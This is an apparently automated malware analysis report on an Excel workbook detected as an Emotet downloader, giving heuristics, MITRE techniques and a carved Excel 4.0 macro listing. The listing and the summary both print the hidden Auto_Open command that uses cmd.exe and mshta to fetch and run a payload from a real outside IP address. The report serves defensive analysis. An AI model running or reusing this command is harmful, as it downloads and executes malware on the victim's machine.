MALICIOUS
362
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is designed to execute a command. This command, 'CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html', attempts to download and execute a second-stage payload from the provided URL. The ClamAV detection 'Doc.Downloader.EmotetRed02220-9938645-0' further supports the downloader functionality.
Heuristics 9
-
ClamAV: Doc.Downloader.EmotetRed02220-9938645-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.EmotetRed02220-9938645-0
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to mshta.exe high SC_STR_MSHTAReference to mshta.exe
-
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMANDExtracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://91.240.118.172/cc/vv/fe.htmlB In document text (OLE body)
- http://91.240.118.172/cc/vv/fe.htmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt201fc8a6dfed1f2137f68d135949eaad0d28f108842c13f39cb9773e98a80cec |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 659 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 15 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Protec
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - LINK
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, hidden - Sheet
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Protec!C1
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' LINK,C3,EXEC("CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html"),""
' LINK,C5,HALT(),""
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.